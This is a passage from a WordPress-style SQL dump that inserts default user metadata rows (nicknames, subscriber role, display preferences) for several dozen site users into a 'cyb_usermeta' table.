(51723, 4005, 'admin_color', 'fresh'),
(51724, 4005, 'use_ssl', '0'),
(51725, 4005, 'show_admin_bar_front', 'true'),
(51726, 4005, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51727, 4005, 'cyb_user_level', '0'),
(51728, 4005, 'default_password_nag', '1'),
(51729, 4006, 'nickname', 'lsilberman821976'),
(51730, 4006, 'first_name', ''),
(51731, 4006, 'last_name', ''),
(51732, 4006, 'description', ''),
(51733, 4006, 'rich_editing', 'true'),
(51734, 4006, 'comment_shortcuts', 'false'),
(51735, 4006, 'admin_color', 'fresh'),
(51736, 4006, 'use_ssl', '0'),
(51737, 4006, 'show_admin_bar_front', 'true'),
(51738, 4006, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51739, 4006, 'cyb_user_level', '0'),
(51740, 4006, 'default_password_nag', '1'),
(51741, 4007, 'nickname', 'thegroobsters1978'),
(51742, 4007, 'first_name', ''),
(51743, 4007, 'last_name', ''),
(51744, 4007, 'description', ''),
(51745, 4007, 'rich_editing', 'true'),
(51746, 4007, 'comment_shortcuts', 'false'),
(51747, 4007, 'admin_color', 'fresh'),
(51748, 4007, 'use_ssl', '0'),
(51749, 4007, 'show_admin_bar_front', 'true'),
(51750, 4007, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51751, 4007, 'cyb_user_level', '0'),
(51752, 4007, 'default_password_nag', '1'),
(51753, 4008, 'nickname', 'rachelmbayer1982'),
(51754, 4008, 'first_name', ''),
(51755, 4008, 'last_name', ''),
(51756, 4008, 'description', ''),
(51757, 4008, 'rich_editing', 'true'),
(51758, 4008, 'comment_shortcuts', 'false'),
(51759, 4008, 'admin_color', 'fresh'),
(51760, 4008, 'use_ssl', '0'),
(51761, 4008, 'show_admin_bar_front', 'true'),
(51762, 4008, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51763, 4008, 'cyb_user_level', '0'),
(51764, 4008, 'default_password_nag', '1'),
(51765, 4009, 'nickname', 'fillam41171960'),
(51766, 4009, 'first_name', ''),
(51767, 4009, 'last_name', ''),
(51768, 4009, 'description', ''),
(51769, 4009, 'rich_editing', 'true'),
(51770, 4009, 'comment_shortcuts', 'false'),
(51771, 4009, 'admin_color', 'fresh'),
(51772, 4009, 'use_ssl', '0'),
(51773, 4009, 'show_admin_bar_front', 'true'),
(51774, 4009, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51775, 4009, 'cyb_user_level', '0'),
(51776, 4009, 'default_password_nag', '1'),
(51777, 4010, 'nickname', 'steve.jarvis1955'),
(51778, 4010, 'first_name', ''),
(51779, 4010, 'last_name', ''),
(51780, 4010, 'description', ''),
(51781, 4010, 'rich_editing', 'true'),
(51782, 4010, 'comment_shortcuts', 'false'),
(51783, 4010, 'admin_color', 'fresh'),
(51784, 4010, 'use_ssl', '0'),
(51785, 4010, 'show_admin_bar_front', 'true'),
(51786, 4010, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51787, 4010, 'cyb_user_level', '0'),
(51788, 4010, 'default_password_nag', '1'),
(51789, 4011, 'nickname', 'briidgett112004'),
(51790, 4011, 'first_name', ''),
(51791, 4011, 'last_name', ''),
(51792, 4011, 'description', ''),
(51793, 4011, 'rich_editing', 'true'),
(51794, 4011, 'comment_shortcuts', 'false'),
(51795, 4011, 'admin_color', 'fresh'),
(51796, 4011, 'use_ssl', '0'),
(51797, 4011, 'show_admin_bar_front', 'true'),
(51798, 4011, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51799, 4011, 'cyb_user_level', '0'),
(51800, 4011, 'default_password_nag', '1'),
(51801, 4012, 'nickname', 'maryknollvicencio1966'),
(51802, 4012, 'first_name', ''),
(51803, 4012, 'last_name', ''),
(51804, 4012, 'description', '');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(51805, 4012, 'rich_editing', 'true'),
(51806, 4012, 'comment_shortcuts', 'false'),
(51807, 4012, 'admin_color', 'fresh'),
(51808, 4012, 'use_ssl', '0'),
(51809, 4012, 'show_admin_bar_front', 'true'),
(51810, 4012, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51811, 4012, 'cyb_user_level', '0'),
(51812, 4012, 'default_password_nag', '1'),
(51813, 4013, 'nickname', 'amanda.nather1959'),
(51814, 4013, 'first_name', ''),
(51815, 4013, 'last_name', ''),
(51816, 4013, 'description', ''),
(51817, 4013, 'rich_editing', 'true'),
(51818, 4013, 'comment_shortcuts', 'false'),
(51819, 4013, 'admin_color', 'fresh'),
(51820, 4013, 'use_ssl', '0'),
(51821, 4013, 'show_admin_bar_front', 'true'),
(51822, 4013, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51823, 4013, 'cyb_user_level', '0'),
(51824, 4013, 'default_password_nag', '1'),
(51838, 4015, 'first_name', ''),
(51839, 4015, 'last_name', ''),
(51840, 4015, 'description', ''),
(51841, 4015, 'rich_editing', 'true'),
(51842, 4015, 'comment_shortcuts', 'false'),
(51843, 4015, 'admin_color', 'fresh'),
(51844, 4015, 'use_ssl', '0'),
(51845, 4015, 'show_admin_bar_front', 'true'),
(51846, 4015, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51847, 4015, 'cyb_user_level', '0'),
(51848, 4015, 'default_password_nag', '1'),
(51849, 4016, 'nickname', 'customerservice1960'),
(51850, 4016, 'first_name', ''),
(51851, 4016, 'last_name', ''),
(51852, 4016, 'description', ''),
(51853, 4016, 'rich_editing', 'true'),
(51854, 4016, 'comment_shortcuts', 'false'),
(51855, 4016, 'admin_color', 'fresh'),
(51856, 4016, 'use_ssl', '0'),
(51857, 4016, 'show_admin_bar_front', 'true'),
(51858, 4016, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51859, 4016, 'cyb_user_level', '0'),
(51860, 4016, 'default_password_nag', '1'),
(51861, 4017, 'nickname', 'wucando2003'),
(51862, 4017, 'first_name', ''),
(51863, 4017, 'last_name', ''),
(51864, 4017, 'description', ''),
(51865, 4017, 'rich_editing', 'true'),
(51866, 4017, 'comment_shortcuts', 'false'),
(51867, 4017, 'admin_color', 'fresh'),
(51868, 4017, 'use_ssl', '0'),
(51869, 4017, 'show_admin_bar_front', 'true'),
(51870, 4017, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51871, 4017, 'cyb_user_level', '0'),
(51872, 4017, 'default_password_nag', '1'),
(51873, 4018, 'nickname', 'frankandjaime1952'),
(51874, 4018, 'first_name', ''),
(51875, 4018, 'last_name', ''),
(51876, 4018, 'description', ''),
(51877, 4018, 'rich_editing', 'true'),
(51878, 4018, 'comment_shortcuts', 'false'),
(51879, 4018, 'admin_color', 'fresh'),
(51880, 4018, 'use_ssl', '0'),
(51881, 4018, 'show_admin_bar_front', 'true'),
(51882, 4018, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51883, 4018, 'cyb_user_level', '0'),
(51884, 4018, 'default_password_nag', '1'),
(51885, 4019, 'nickname', 'sfeuropean1999'),
(51886, 4019, 'first_name', ''),
(51887, 4019, 'last_name', ''),
(51888, 4019, 'description', ''),
(51889, 4019, 'rich_editing', 'true'),
(51890, 4019, 'comment_shortcuts', 'false'),
(51891, 4019, 'admin_color', 'fresh'),
(51892, 4019, 'use_ssl', '0'),
(51893, 4019, 'show_admin_bar_front', 'true'),
(51894, 4019, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51895, 4019, 'cyb_user_level', '0'),
(51896, 4019, 'default_password_nag', '1'),
(51897, 4020, 'nickname', 'kmevans331976'),
(51898, 4020, 'first_name', ''),
(51899, 4020, 'last_name', ''),
(51900, 4020, 'description', ''),
(51901, 4020, 'rich_editing', 'true'),
(51902, 4020, 'comment_shortcuts', 'false'),
(51903, 4020, 'admin_color', 'fresh'),
(51904, 4020, 'use_ssl', '0'),
(51905, 4020, 'show_admin_bar_front', 'true'),
(51906, 4020, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51907, 4020, 'cyb_user_level', '0'),
(51908, 4020, 'default_password_nag', '1'),
(51909, 4021, 'nickname', 'angaritag1965'),
(51910, 4021, 'first_name', ''),
(51911, 4021, 'last_name', ''),
(51912, 4021, 'description', ''),
(51913, 4021, 'rich_editing', 'true'),
(51914, 4021, 'comment_shortcuts', 'false'),
(51915, 4021, 'admin_color', 'fresh'),
(51916, 4021, 'use_ssl', '0'),
(51917, 4021, 'show_admin_bar_front', 'true'),
(51918, 4021, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51919, 4021, 'cyb_user_level', '0'),
(51920, 4021, 'default_password_nag', '1'),
(51921, 4022, 'nickname', 'doubledprints1961'),
(51922, 4022, 'first_name', ''),
(51923, 4022, 'last_name', ''),
(51924, 4022, 'description', ''),
(51925, 4022, 'rich_editing', 'true'),
(51926, 4022, 'comment_shortcuts', 'false'),
(51927, 4022, 'admin_color', 'fresh'),
(51928, 4022, 'use_ssl', '0'),
(51929, 4022, 'show_admin_bar_front', 'true'),
(51930, 4022, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51931, 4022, 'cyb_user_level', '0'),
(51932, 4022, 'default_password_nag', '1'),
(51933, 4023, 'nickname', 'ekrusze2007'),
(51934, 4023, 'first_name', ''),
(51935, 4023, 'last_name', ''),
(51936, 4023, 'description', ''),
(51937, 4023, 'rich_editing', 'true'),
(51938, 4023, 'comment_shortcuts', 'false'),
(51939, 4023, 'admin_color', 'fresh'),
(51940, 4023, 'use_ssl', '0'),
(51941, 4023, 'show_admin_bar_front', 'true'),
(51942, 4023, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51943, 4023, 'cyb_user_level', '0'),
(51944, 4023, 'default_password_nag', '1'),
(51945, 4024, 'nickname', 'anniemcclure1985'),
(51946, 4024, 'first_name', ''),
(51947, 4024, 'last_name', ''),
(51948, 4024, 'description', ''),
(51949, 4024, 'rich_editing', 'true'),
(51950, 4024, 'comment_shortcuts', 'false'),
(51951, 4024, 'admin_color', 'fresh'),
(51952, 4024, 'use_ssl', '0'),
(51953, 4024, 'show_admin_bar_front', 'true'),
(51954, 4024, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51955, 4024, 'cyb_user_level', '0'),
(51956, 4024, 'default_password_nag', '1'),
(51957, 4025, 'nickname', 'romahaf1968'),
(51958, 4025, 'first_name', ''),
(51959, 4025, 'last_name', ''),
(51960, 4025, 'description', ''),
(51961, 4025, 'rich_editing', 'true'),
(51962, 4025, 'comment_shortcuts', 'false'),
(51963, 4025, 'admin_color', 'fresh'),
(51964, 4025, 'use_ssl', '0'),
(51965, 4025, 'show_admin_bar_front', 'true'),
(51966, 4025, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51967, 4025, 'cyb_user_level', '0'),
(51968, 4025, 'default_password_nag', '1'),
(51969, 4026, 'nickname', 'wmgebis1986'),
(51970, 4026, 'first_name', ''),
(51971, 4026, 'last_name', ''),
(51972, 4026, 'description', ''),
(51973, 4026, 'rich_editing', 'true'),
(51974, 4026, 'comment_shortcuts', 'false'),
(51975, 4026, 'admin_color', 'fresh'),
(51976, 4026, 'use_ssl', '0'),
(51977, 4026, 'show_admin_bar_front', 'true'),
(51978, 4026, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51979, 4026, 'cyb_user_level', '0'),
(51980, 4026, 'default_password_nag', '1'),
(51981, 4027, 'nickname', 'jchou19802005'),
(51982, 4027, 'first_name', ''),
(51983, 4027, 'last_name', ''),
(51984, 4027, 'description', ''),
(51985, 4027, 'rich_editing', 'true'),
(51986, 4027, 'comment_shortcuts', 'false'),
(51987, 4027, 'admin_color', 'fresh'),
(51988, 4027, 'use_ssl', '0'),
(51989, 4027, 'show_admin_bar_front', 'true'),
(51990, 4027, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(51991, 4027, 'cyb_user_level', '0'),
(51992, 4027, 'default_password_nag', '1'),
(51993, 4028, 'nickname', 'bonpron1969'),
(51994, 4028, 'first_name', ''),
(51995, 4028, 'last_name', ''),
(51996, 4028, 'description', ''),
(51997, 4028, 'rich_editing', 'true'),
(51998, 4028, 'comment_shortcuts', 'false'),
(51999, 4028, 'admin_color', 'fresh'),
(52000, 4028, 'use_ssl', '0'),
(52001, 4028, 'show_admin_bar_front', 'true'),
(52002, 4028, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52003, 4028, 'cyb_user_level', '0'),
(52004, 4028, 'default_password_nag', '1'),
(52005, 4029, 'nickname', 'nicole.chapple1977'),
(52006, 4029, 'first_name', ''),
(52007, 4029, 'last_name', ''),
(52008, 4029, 'description', ''),
(52009, 4029, 'rich_editing', 'true'),
(52010, 4029, 'comment_shortcuts', 'false'),
(52011, 4029, 'admin_color', 'fresh'),
(52012, 4029, 'use_ssl', '0'),
(52013, 4029, 'show_admin_bar_front', 'true'),
(52014, 4029, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52015, 4029, 'cyb_user_level', '0'),
(52016, 4029, 'default_password_nag', '1'),
(52017, 4030, 'nickname', 'connie35820081958'),
(52018, 4030, 'first_name', ''),
(52019, 4030, 'last_name', ''),
(52020, 4030, 'description', ''),
(52021, 4030, 'rich_editing', 'true'),
(52022, 4030, 'comment_shortcuts', 'false'),
(52023, 4030, 'admin_color', 'fresh'),
(52024, 4030, 'use_ssl', '0'),
(52025, 4030, 'show_admin_bar_front', 'true'),
(52026, 4030, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52027, 4030, 'cyb_user_level', '0'),
(52028, 4030, 'default_password_nag', '1'),
(52029, 4031, 'nickname', 'dlanham41970'),
(52030, 4031, 'first_name', ''),
(52031, 4031, 'last_name', ''),
(52032, 4031, 'description', ''),
(52033, 4031, 'rich_editing', 'true'),
(52034, 4031, 'comment_shortcuts', 'false'),
(52035, 4031, 'admin_color', 'fresh'),
(52036, 4031, 'use_ssl', '0'),
(52037, 4031, 'show_admin_bar_front', 'true'),
(52038, 4031, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52039, 4031, 'cyb_user_level', '0'),
(52040, 4031, 'default_password_nag', '1'),
(52041, 4032, 'nickname', 'ryanhoium1982'),
(52042, 4032, 'first_name', ''),
(52043, 4032, 'last_name', ''),
(52044, 4032, 'description', ''),
(52045, 4032, 'rich_editing', 'true'),
(52046, 4032, 'comment_shortcuts', 'false'),
(52047, 4032, 'admin_color', 'fresh'),
(52048, 4032, 'use_ssl', '0'),
(52049, 4032, 'show_admin_bar_front', 'true'),
(52050, 4032, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52051, 4032, 'cyb_user_level', '0'),
(52052, 4032, 'default_password_nag', '1'),
(52053, 4033, 'nickname', 'tinnyou1981'),
(52054, 4033, 'first_name', ''),
(52055, 4033, 'last_name', ''),
(52056, 4033, 'description', ''),
(52057, 4033, 'rich_editing', 'true'),
(52058, 4033, 'comment_shortcuts', 'false'),
(52059, 4033, 'admin_color', 'fresh'),
(52060, 4033, 'use_ssl', '0'),
(52061, 4033, 'show_admin_bar_front', 'true'),
(52062, 4033, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52063, 4033, 'cyb_user_level', '0'),
(52064, 4033, 'default_password_nag', '1'),
(52065, 4034, 'nickname', 'pilgrimd1986'),
(52066, 4034, 'first_name', ''),
(52067, 4034, 'last_name', ''),
(52068, 4034, 'description', ''),
(52069, 4034, 'rich_editing', 'true'),
(52070, 4034, 'comment_shortcuts', 'false'),
(52071, 4034, 'admin_color', 'fresh'),
(52072, 4034, 'use_ssl', '0'),
(52073, 4034, 'show_admin_bar_front', 'true'),
(52074, 4034, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52075, 4034, 'cyb_user_level', '0'),
(52076, 4034, 'default_password_nag', '1'),
(52077, 4035, 'nickname', 'texascowgirl3741950'),
(52078, 4035, 'first_name', ''),
(52079, 4035, 'last_name', ''),
(52080, 4035, 'description', ''),
(52081, 4035, 'rich_editing', 'true'),
(52082, 4035, 'comment_shortcuts', 'false'),
(52083, 4035, 'admin_color', 'fresh'),
(52084, 4035, 'use_ssl', '0'),
(52085, 4035, 'show_admin_bar_front', 'true'),
(52086, 4035, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52087, 4035, 'cyb_user_level', '0'),
(52088, 4035, 'default_password_nag', '1'),
(52089, 4036, 'nickname', 'ebook4airbnb1958'),
(52090, 4036, 'first_name', ''),
(52091, 4036, 'last_name', ''),
(52092, 4036, 'description', ''),
(52093, 4036, 'rich_editing', 'true'),
(52094, 4036, 'comment_shortcuts', 'false'),
(52095, 4036, 'admin_color', 'fresh'),
(52096, 4036, 'use_ssl', '0'),
(52097, 4036, 'show_admin_bar_front', 'true'),
(52098, 4036, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52099, 4036, 'cyb_user_level', '0'),
(52100, 4036, 'default_password_nag', '1'),
(52101, 4037, 'nickname', 'bookworm692000'),
(52102, 4037, 'first_name', ''),
(52103, 4037, 'last_name', ''),
(52104, 4037, 'description', ''),
(52105, 4037, 'rich_editing', 'true'),
(52106, 4037, 'comment_shortcuts', 'false'),
(52107, 4037, 'admin_color', 'fresh'),
(52108, 4037, 'use_ssl', '0'),
(52109, 4037, 'show_admin_bar_front', 'true'),
(52110, 4037, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52111, 4037, 'cyb_user_level', '0'),
(52112, 4037, 'default_password_nag', '1'),
(52113, 4038, 'nickname', 'rory.murphy1973'),
(52114, 4038, 'first_name', ''),
(52115, 4038, 'last_name', ''),
(52116, 4038, 'description', ''),
(52117, 4038, 'rich_editing', 'true'),
(52118, 4038, 'comment_shortcuts', 'false'),
(52119, 4038, 'admin_color', 'fresh'),
(52120, 4038, 'use_ssl', '0'),
(52121, 4038, 'show_admin_bar_front', 'true'),
(52122, 4038, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52123, 4038, 'cyb_user_level', '0'),
(52124, 4038, 'default_password_nag', '1'),
(52125, 4039, 'nickname', 'scottweaver251989'),
(52126, 4039, 'first_name', ''),
(52127, 4039, 'last_name', ''),
(52128, 4039, 'description', ''),
(52129, 4039, 'rich_editing', 'true'),
(52130, 4039, 'comment_shortcuts', 'false'),
(52131, 4039, 'admin_color', 'fresh'),
(52132, 4039, 'use_ssl', '0'),
(52133, 4039, 'show_admin_bar_front', 'true'),
(52134, 4039, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52135, 4039, 'cyb_user_level', '0'),
(52136, 4039, 'default_password_nag', '1'),
(52137, 4040, 'nickname', 'terry_sanders_jr1979'),
(52138, 4040, 'first_name', ''),
(52139, 4040, 'last_name', ''),
(52140, 4040, 'description', ''),
(52141, 4040, 'rich_editing', 'true'),
(52142, 4040, 'comment_shortcuts', 'false'),
(52143, 4040, 'admin_color', 'fresh'),
(52144, 4040, 'use_ssl', '0'),
(52145, 4040, 'show_admin_bar_front', 'true'),
(52146, 4040, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52147, 4040, 'cyb_user_level', '0'),
(52148, 4040, 'default_password_nag', '1'),
(52149, 4041, 'nickname', 'jo6jor2003'),
(52150, 4041, 'first_name', ''),
(52151, 4041, 'last_name', ''),
(52152, 4041, 'description', ''),
(52153, 4041, 'rich_editing', 'true'),
(52154, 4041, 'comment_shortcuts', 'false'),
(52155, 4041, 'admin_color', 'fresh'),
(52156, 4041, 'use_ssl', '0'),
(52157, 4041, 'show_admin_bar_front', 'true'),
(52158, 4041, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52159, 4041, 'cyb_user_level', '0'),
(52160, 4041, 'default_password_nag', '1'),
(52161, 4042, 'nickname', 'jcalcione1975'),
(52162, 4042, 'first_name', ''),
(52163, 4042, 'last_name', ''),
(52164, 4042, 'description', ''),
(52165, 4042, 'rich_editing', 'true'),
(52166, 4042, 'comment_shortcuts', 'false'),
(52167, 4042, 'admin_color', 'fresh'),
(52168, 4042, 'use_ssl', '0'),
(52169, 4042, 'show_admin_bar_front', 'true'),
(52170, 4042, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52171, 4042, 'cyb_user_level', '0'),
(52172, 4042, 'default_password_nag', '1'),
(52173, 4043, 'nickname', 'zackka21988'),
(52174, 4043, 'first_name', ''),
(52175, 4043, 'last_name', ''),
(52176, 4043, 'description', ''),
(52177, 4043, 'rich_editing', 'true'),
(52178, 4043, 'comment_shortcuts', 'false'),
(52179, 4043, 'admin_color', 'fresh'),
(52180, 4043, 'use_ssl', '0'),
(52181, 4043, 'show_admin_bar_front', 'true'),
(52182, 4043, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52183, 4043, 'cyb_user_level', '0'),
(52184, 4043, 'default_password_nag', '1'),
(52185, 4044, 'nickname', 'jdgstat1961'),
(52186, 4044, 'first_name', ''),
(52187, 4044, 'last_name', ''),
(52188, 4044, 'description', ''),
(52189, 4044, 'rich_editing', 'true'),
(52190, 4044, 'comment_shortcuts', 'false'),
(52191, 4044, 'admin_color', 'fresh'),
(52192, 4044, 'use_ssl', '0'),
(52193, 4044, 'show_admin_bar_front', 'true'),
(52194, 4044, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52195, 4044, 'cyb_user_level', '0'),
(52196, 4044, 'default_password_nag', '1'),
(52197, 4045, 'nickname', 'mmf50201977'),
(52198, 4045, 'first_name', ''),
(52199, 4045, 'last_name', ''),
(52200, 4045, 'description', ''),
(52201, 4045, 'rich_editing', 'true'),
(52202, 4045, 'comment_shortcuts', 'false'),
(52203, 4045, 'admin_color', 'fresh'),
(52204, 4045, 'use_ssl', '0'),
(52205, 4045, 'show_admin_bar_front', 'true'),
(52206, 4045, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52207, 4045, 'cyb_user_level', '0'),
(52208, 4045, 'default_password_nag', '1'),
(52209, 4046, 'nickname', 'roger2009'),
(52210, 4046, 'first_name', ''),
(52211, 4046, 'last_name', ''),
(52212, 4046, 'description', ''),
(52213, 4046, 'rich_editing', 'true'),
(52214, 4046, 'comment_shortcuts', 'false'),
(52215, 4046, 'admin_color', 'fresh'),
(52216, 4046, 'use_ssl', '0'),
(52217, 4046, 'show_admin_bar_front', 'true'),
(52218, 4046, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52219, 4046, 'cyb_user_level', '0'),
(52220, 4046, 'default_password_nag', '1'),
(52221, 4047, 'nickname', 'henedina524081958'),
(52222, 4047, 'first_name', ''),
(52223, 4047, 'last_name', ''),
(52224, 4047, 'description', ''),
(52225, 4047, 'rich_editing', 'true'),
(52226, 4047, 'comment_shortcuts', 'false'),
(52227, 4047, 'admin_color', 'fresh'),
(52228, 4047, 'use_ssl', '0'),
(52229, 4047, 'show_admin_bar_front', 'true'),
(52230, 4047, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52231, 4047, 'cyb_user_level', '0'),
(52232, 4047, 'default_password_nag', '1'),
(52233, 4048, 'nickname', 'the_cromers1988'),
(52234, 4048, 'first_name', ''),
(52235, 4048, 'last_name', ''),
(52236, 4048, 'description', ''),
(52237, 4048, 'rich_editing', 'true'),
(52238, 4048, 'comment_shortcuts', 'false'),
(52239, 4048, 'admin_color', 'fresh'),
(52240, 4048, 'use_ssl', '0'),
(52241, 4048, 'show_admin_bar_front', 'true'),
(52242, 4048, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52243, 4048, 'cyb_user_level', '0'),
(52244, 4048, 'default_password_nag', '1'),
(52245, 4049, 'nickname', 'julieanndavison2010'),
(52246, 4049, 'first_name', ''),
(52247, 4049, 'last_name', ''),
(52248, 4049, 'description', ''),
(52249, 4049, 'rich_editing', 'true'),
(52250, 4049, 'comment_shortcuts', 'false'),
(52251, 4049, 'admin_color', 'fresh'),
(52252, 4049, 'use_ssl', '0'),
(52253, 4049, 'show_admin_bar_front', 'true'),
(52254, 4049, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52255, 4049, 'cyb_user_level', '0'),
(52256, 4049, 'default_password_nag', '1'),
(52257, 4050, 'nickname', 'smith_20_012005'),
(52258, 4050, 'first_name', ''),
(52259, 4050, 'last_name', ''),
(52260, 4050, 'description', ''),
(52261, 4050, 'rich_editing', 'true'),
(52262, 4050, 'comment_shortcuts', 'false'),
(52263, 4050, 'admin_color', 'fresh'),
(52264, 4050, 'use_ssl', '0'),
(52265, 4050, 'show_admin_bar_front', 'true'),
(52266, 4050, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52267, 4050, 'cyb_user_level', '0'),
(52268, 4050, 'default_password_nag', '1'),
(52269, 4051, 'nickname', 'damhestheman1971'),
(52270, 4051, 'first_name', ''),
(52271, 4051, 'last_name', ''),
(52272, 4051, 'description', ''),
(52273, 4051, 'rich_editing', 'true'),
(52274, 4051, 'comment_shortcuts', 'false'),
(52275, 4051, 'admin_color', 'fresh'),
(52276, 4051, 'use_ssl', '0'),
(52277, 4051, 'show_admin_bar_front', 'true'),
(52278, 4051, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52279, 4051, 'cyb_user_level', '0'),
(52280, 4051, 'default_password_nag', '1'),
(52281, 4052, 'nickname', 'nfprescott1982'),
(52282, 4052, 'first_name', ''),
(52283, 4052, 'last_name', ''),
(52284, 4052, 'description', ''),
(52285, 4052, 'rich_editing', 'true'),
(52286, 4052, 'comment_shortcuts', 'false'),
(52287, 4052, 'admin_color', 'fresh'),
(52288, 4052, 'use_ssl', '0'),
(52289, 4052, 'show_admin_bar_front', 'true'),
(52290, 4052, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52291, 4052, 'cyb_user_level', '0'),
(52292, 4052, 'default_password_nag', '1'),
(52293, 4053, 'nickname', 'raymond.funk1959'),
(52294, 4053, 'first_name', ''),
(52295, 4053, 'last_name', ''),
(52296, 4053, 'description', ''),
(52297, 4053, 'rich_editing', 'true'),
(52298, 4053, 'comment_shortcuts', 'false'),
(52299, 4053, 'admin_color', 'fresh'),
(52300, 4053, 'use_ssl', '0'),
(52301, 4053, 'show_admin_bar_front', 'true'),
(52302, 4053, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52303, 4053, 'cyb_user_level', '0'),
(52304, 4053, 'default_password_nag', '1'),
(52305, 4054, 'nickname', 'vmahl2005'),
(52306, 4054, 'first_name', ''),
(52307, 4054, 'last_name', ''),
(52308, 4054, 'description', ''),
(52309, 4054, 'rich_editing', 'true'),
(52310, 4054, 'comment_shortcuts', 'false'),
(52311, 4054, 'admin_color', 'fresh'),
(52312, 4054, 'use_ssl', '0'),
(52313, 4054, 'show_admin_bar_front', 'true'),
(52314, 4054, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52315, 4054, 'cyb_user_level', '0'),
(52316, 4054, 'default_password_nag', '1'),
(52336, 4056, 'use_ssl', '0'),
(52337, 4056, 'show_admin_bar_front', 'true'),
(52338, 4056, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52339, 4056, 'cyb_user_level', '0'),
(52340, 4056, 'default_password_nag', '1'),
(52341, 4057, 'nickname', 'slg40071973'),
(52342, 4057, 'first_name', ''),
(52343, 4057, 'last_name', ''),
(52344, 4057, 'description', ''),
(52345, 4057, 'rich_editing', 'true'),
(52346, 4057, 'comment_shortcuts', 'false'),
(52347, 4057, 'admin_color', 'fresh'),
(52348, 4057, 'use_ssl', '0'),
(52349, 4057, 'show_admin_bar_front', 'true'),
(52350, 4057, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52351, 4057, 'cyb_user_level', '0'),
(52352, 4057, 'default_password_nag', '1'),
(52353, 4058, 'nickname', 'aaronbrabson1988'),
(52354, 4058, 'first_name', ''),
(52355, 4058, 'last_name', ''),
(52356, 4058, 'description', ''),
(52357, 4058, 'rich_editing', 'true'),
(52358, 4058, 'comment_shortcuts', 'false'),
(52359, 4058, 'admin_color', 'fresh'),
(52360, 4058, 'use_ssl', '0'),
(52361, 4058, 'show_admin_bar_front', 'true'),
(52362, 4058, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52363, 4058, 'cyb_user_level', '0'),
(52364, 4058, 'default_password_nag', '1'),
(52365, 4059, 'nickname', 'gloskarn1972'),
(52366, 4059, 'first_name', ''),
(52367, 4059, 'last_name', ''),
(52368, 4059, 'description', ''),
(52369, 4059, 'rich_editing', 'true'),
(52370, 4059, 'comment_shortcuts', 'false'),
(52371, 4059, 'admin_color', 'fresh'),
(52372, 4059, 'use_ssl', '0'),
(52373, 4059, 'show_admin_bar_front', 'true'),
(52374, 4059, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(52375, 4059, 'cyb_user_level', '0'),
(52376, 4059, 'default_password_nag', '1'),
(52377, 4060, 'nickname', 'ernestoag20001953'),
(52378, 4060, 'first_name', ''),
(52379, 4060, 'last_name', ''),
(52380, 4060, 'description', ''),
(52381, 4060, 'rich_editing', 'true'),
(52382, 4060, 'comment_shortcuts', 'false'),
(52383, 4060, 'admin_color', 'fresh'),
(52384, 4060, 'use_ssl', '0'),
